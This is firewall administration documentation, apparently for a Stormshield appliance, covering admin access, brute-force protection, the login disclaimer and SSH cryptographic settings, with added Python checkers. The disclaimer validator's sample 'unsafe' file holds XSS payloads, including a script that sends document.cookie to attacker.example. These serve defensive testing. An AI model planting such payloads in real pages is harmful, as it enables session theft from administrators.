Firewall administration tab

Access to the firewall’s administration interface

Allow the 'admin' account to log in The admin account is the only account with all privileges, and it can connect without using certificates. Unselect this checkbox to disable the admin account's access to the firewall's administration interface. It will still be able to access the firewall via SSH or in console mode.

IMPORTANT
This account must be considered “dangerous”, given the extent of its configuration possibilities and the access privileges granted to it.

Listening port This field represents the port on which administrators can access the administration interface (https, tcp/443 by default). You can create an additional listening port by clicking on the relevant icon. The new port must use TCP.
Configure the SSL certificate of the service Click on this link to modify the certificate presented by the firewall’s administration interface and authentication portal.
Maximum idle timeout (for all administrators) Set the longest idle timeout allowed for all administrator accounts on the firewall before they are logged out.
Individual administrator accounts can set a different maximum idle timeout in their preferences as long as it is shorter than the maximum timeout configured.
Enable protection from brute force attacks A brute force attack consists of repeated attempts to connect to the firewall, trying every possible password until one succeeds.
This protection applies to all connections made for the purpose of firewall administration: connections to the web administration interface as well as SSH connections.
Select this option to enable this protection.
Number of authentication attempts allowed

Maximum number of times an administrator can attempt to connect before being blocked (after a wrong login or password, or a case error, for example). By default, the number of attempts allowed is limited to 3.

This field can only be accessed if the Enable protection from brute force attacks option is selected.

Freeze time (minutes)

Duration for which an administrator will not be able to log in to the firewall after the number of failed attempts specified above has been reached. The duration cannot exceed 60 minutes.

This field can only be accessed if the Enable protection from brute force attacks option is selected.

Access to firewall administration pages

Add Select a network object from the drop-down list. It will be treated as an Authorized administration host that will be able to log on to the administration interface. This object may be a host, host group, network or address range.
Delete Select the line to be removed from the list and click on Delete.

Disclaimer for access to the administration interface

Warning file A disclaimer (warning text) can be added to the login page of the firewall's web administration interface; it appears to the right of the authentication window, and the administrator must click on Got it to enable that window.
The file containing the text of the disclaimer can be loaded onto the firewall using the file selector.
For a better layout, the text can be in HTML but must not contain JavaScript. Once the file has been saved on the firewall, its contents can be displayed using the corresponding button.
Deleting the warning file This button deletes the warning file previously loaded onto the firewall.
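The "HTML but no JavaScript" rule above is easy to break by accident (an event-handler attribute or an entity-encoded javascript: URL is still JavaScript). The following pre-upload check is an added example written for this page; it is not Stormshield's own validation and makes no claim about what the firewall itself rejects. The two sample disclaimer files are constructed for the example.

```python
"""Pre-upload check for a warning (disclaimer) file: HTML allowed, JavaScript not.

Added example, not Stormshield's own validation. It flags the constructs that
would run script inside the login page: <script> elements, on* event-handler
attributes, javascript: URLs (also when the scheme is HTML-entity encoded),
and srcdoc attributes, which can embed a complete scripted document.
"""
from html.parser import HTMLParser

# Attributes whose value a browser treats as a URL and will follow.
URL_ATTRIBUTES = {"href", "src", "action", "formaction", "data", "poster", "background"}


class _ScriptFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    # Also reached for self-closing tags: HTMLParser routes <img ... /> here.
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("<script> element")
        for name, value in attrs:
            name = name.lower()
            # HTMLParser has already decoded entities such as &#106; in the value.
            value = value or ""
            if name.startswith("on"):
                self.findings.append(f"event handler '{name}' on <{tag}>")
            elif name == "srcdoc":
                self.findings.append(f"srcdoc on <{tag}> (inline document)")
            elif name in URL_ATTRIBUTES:
                # Browsers strip tab, newline and other control characters from a
                # URL before parsing its scheme, so remove them before matching.
                scheme = "".join(c for c in value if not c.isspace() and ord(c) > 31).lower()
                if scheme.startswith("javascript:"):
                    self.findings.append(f"javascript: URL in '{name}' on <{tag}>")


def find_javascript(html_text: str) -> list:
    """Return a description of every JavaScript-bearing construct found, or [] if none."""
    finder = _ScriptFinder()
    finder.feed(html_text)
    finder.close()
    return finder.findings


def disclaimer_is_acceptable(html_text: str) -> bool:
    return not find_javascript(html_text)


# Constructed sample files (not taken from any real firewall).
SAFE_DISCLAIMER = """<h2>Authorised administrators only</h2>
<p>Access to this device is restricted. Every connection attempt,
successful or not, is <strong>logged</strong>.</p>
<p><a href="https://intranet.example/policy">Acceptable use policy</a></p>"""

UNSAFE_DISCLAIMER = """<h2>Notice</h2>
<img src="missing.png" onerror="alert(document.domain)">
<a href="&#106;avascript:alert(1)">policy</a>
<script>fetch("https://attacker.example/?c=" + document.cookie)</script>"""


if __name__ == "__main__":
    for label, text in (("safe", SAFE_DISCLAIMER), ("unsafe", UNSAFE_DISCLAIMER)):
        print(label, "->", find_javascript(text) or "no JavaScript found")
```

Run the check on the file before loading it with the file selector; anything it reports should be removed rather than trusted to be harmless, since the text is rendered inside the same origin as the administration interface.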

Remote SSH access

NOTE
The user must be connected with the admin account to modify parameters for remote access via SSH.

Enable SSH access

SSH (Secure Shell) is a protocol that allows users to log in to a remote host over an encrypted link and to execute commands on it.

Selecting this option enables SSH access to the firewall for the admin account and for accounts declared as firewall administrators with the "Console (SSH)" permission. When this checkbox is not selected, no account can connect to the firewall via SSH.

All connection attempts, successful or unsuccessful, are logged.

Enable password access

When this checkbox is selected, all accounts declared as firewall administrators with the "Console (SSH)" permission and the admin account can connect to the firewall via SSH using their password. When it is unselected, administrators must authenticate with a private/public key pair.

This field can only be accessed if the Enable SSH access option is selected.

Use the nsrpc shell for administrators other than the admin account

When this checkbox is selected, all accounts declared as firewall administrators with the "Console (SSH)" permission use only the nsrpc shell interpreter when they open an SSH session on the firewall. Accessing the firewall in this way allows them to use the CLI/Serverd commands according to the privileges that they hold.

When this checkbox is unselected, all accounts declared as firewall administrators with the "Console (SSH)" permission are given the shell interpreter by default. The checkbox does not affect the admin account, which is always given the shell interpreter by default.

IMPORTANT
Accessing the firewall's shell interpreter in this way grants unrestricted access equivalent to super-administrator access. Commands run in this type of session are not logged.


This field can only be accessed if the Enable SSH access option is selected.

Listening port

This field represents the port on which administrators can access the firewall via SSH (SSH, tcp/22 by default). You can create an additional listening port by clicking on the relevant icon. The new port must use TCP.

This field can only be accessed if the Enable SSH access option is selected.

Recommendations

On the firewall

Recommendations:

  • Use an ECDSA key to authenticate,

  • For use beyond 2030, the smallest Diffie-Hellman group to use is group 15 (3072-bit modulus),

  • Configure the following cryptographic suites in the file ConfigFiles/System:

    [SSHCiphers]
    aes256-gcm@openssh.com
    chacha20-poly1305@openssh.com
    aes256-ctr

    [SSHKex]
    curve25519-sha256
    curve25519-sha256@libssh.org
    ecdh-sha2-nistp256

    [SSHMACs]
    hmac-sha2-256-etm@openssh.com

  • Do not use the Encrypt-and-MAC cryptographic suites, in which the MAC is computed over the plaintext rather than the ciphertext (only the -etm variants are Encrypt-then-MAC):

    hmac-sha2-256
    hmac-sha2-512

On the client workstation that connects to the firewall

We recommend configuring the ecdsa-sha2-nistp256 algorithm (ECDSA over the P-256 curve).
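To check a firewall-side policy against the recommendations above and derive the matching client configuration, the following audit script is an added example written for this page, not Stormshield code. It assumes only the [SSHCiphers] / [SSHKex] / [SSHMACs] section layout shown above for ConfigFiles/System; the two policy texts it parses are constructed for the example, and the mapping of the client-side ecdsa-sha2-nistp256 recommendation onto both HostKeyAlgorithms and PubkeyAcceptedAlgorithms is an assumption, not something the page states.

```python
"""Audit an SSH algorithm policy against the recommendations above.

Added example, not Stormshield code. It parses sections in the
[SSHCiphers] / [SSHKex] / [SSHMACs] layout shown for ConfigFiles/System,
reports every algorithm outside the recommended set with the reason it is
weak where that reason is known, and emits a matching OpenSSH client stanza.
"""
import re

# The recommended sets, in the order given on this page.
RECOMMENDED = {
    "SSHCiphers": ["aes256-gcm@openssh.com", "chacha20-poly1305@openssh.com", "aes256-ctr"],
    "SSHKex": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256"],
    "SSHMACs": ["hmac-sha2-256-etm@openssh.com"],
}

# Modulus size of the fixed finite-field Diffie-Hellman groups (RFC 4253, RFC 8268).
DH_GROUP_BITS = {
    "diffie-hellman-group1-sha1": 1024,
    "diffie-hellman-group14-sha1": 2048,
    "diffie-hellman-group14-sha256": 2048,
    "diffie-hellman-group15-sha512": 3072,
    "diffie-hellman-group16-sha512": 4096,
}
MIN_DH_BITS_BEYOND_2030 = 3072  # Diffie-Hellman group 15


def parse_sections(text: str) -> dict:
    """Map each [Section] header to the algorithm names listed under it."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.fullmatch(r"\[(\w+)\]", line)
        if header:
            current = header.group(1)
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def explain(section: str, algo: str) -> str:
    """Name the weakness of an algorithm outside the recommended set, where it is a known pattern."""
    reasons = []
    if section == "SSHMACs" and not algo.endswith("-etm@openssh.com"):
        reasons.append("Encrypt-and-MAC (MAC computed over the plaintext); use the -etm variant")
    if section == "SSHCiphers" and "-cbc" in algo:
        reasons.append("CBC mode; SSH CBC ciphers have known plaintext-recovery attacks")
    if section == "SSHKex":
        bits = DH_GROUP_BITS.get(algo)
        if bits is not None and bits < MIN_DH_BITS_BEYOND_2030:
            reasons.append(f"{bits}-bit DH group, below group 15 ({MIN_DH_BITS_BEYOND_2030} bits) for use beyond 2030")
    if algo.endswith("sha1") or "-sha1-" in algo:
        reasons.append("uses SHA-1")
    return "; ".join(reasons) or "not in the recommended list"


def audit(policy_text: str) -> list:
    """Return (section, algorithm, reason) for every configured algorithm outside the recommendation."""
    findings = []
    for section, algos in parse_sections(policy_text).items():
        allowed = RECOMMENDED.get(section)
        if allowed is None:
            continue  # a section this audit does not cover
        for algo in algos:
            if algo not in allowed:
                findings.append((section, algo, explain(section, algo)))
    return findings


def client_config(host: str, port: int = 22) -> str:
    """OpenSSH ssh_config stanza mirroring the firewall-side policy.

    Assumption, not stated on the page: ecdsa-sha2-nistp256 is applied to both the
    host key and the user public-key algorithm (PubkeyAcceptedAlgorithms needs OpenSSH 8.5+).
    """
    return "\n".join([
        f"Host {host}",
        f"    Port {port}",
        "    Ciphers " + ",".join(RECOMMENDED["SSHCiphers"]),
        "    KexAlgorithms " + ",".join(RECOMMENDED["SSHKex"]),
        "    MACs " + ",".join(RECOMMENDED["SSHMACs"]),
        "    HostKeyAlgorithms ecdsa-sha2-nistp256",
        "    PubkeyAcceptedAlgorithms ecdsa-sha2-nistp256",
        "    PasswordAuthentication no",
    ])


# Constructed policies: the page's recommendation and a weakened variant for comparison.
RECOMMENDED_POLICY = """[SSHCiphers]
aes256-gcm@openssh.com
chacha20-poly1305@openssh.com
aes256-ctr
[SSHKex]
curve25519-sha256
curve25519-sha256@libssh.org
ecdh-sha2-nistp256
[SSHMACs]
hmac-sha2-256-etm@openssh.com
"""

WEAK_POLICY = """[SSHCiphers]
aes256-ctr
aes128-cbc
3des-cbc
[SSHKex]
curve25519-sha256
diffie-hellman-group14-sha256
diffie-hellman-group1-sha1
[SSHMACs]
hmac-sha2-256-etm@openssh.com
hmac-sha2-256
hmac-sha2-512
"""

if __name__ == "__main__":
    for section, algo, reason in audit(WEAK_POLICY):
        print(f"[{section}] {algo}: {reason}")
    print(client_config("fw.example.internal"))
```

The audit reports the two non-ETM MACs named in the last bullet above, both CBC ciphers, and the two Diffie-Hellman groups that fall short of group 15; an empty result for the recommended policy confirms the firewall-side list is exactly as prescribed. The generated stanza pins the same algorithms on the workstation so that the client cannot silently negotiate down if the firewall's list is later loosened, and disables password authentication to match the key-only mode described under Enable password access.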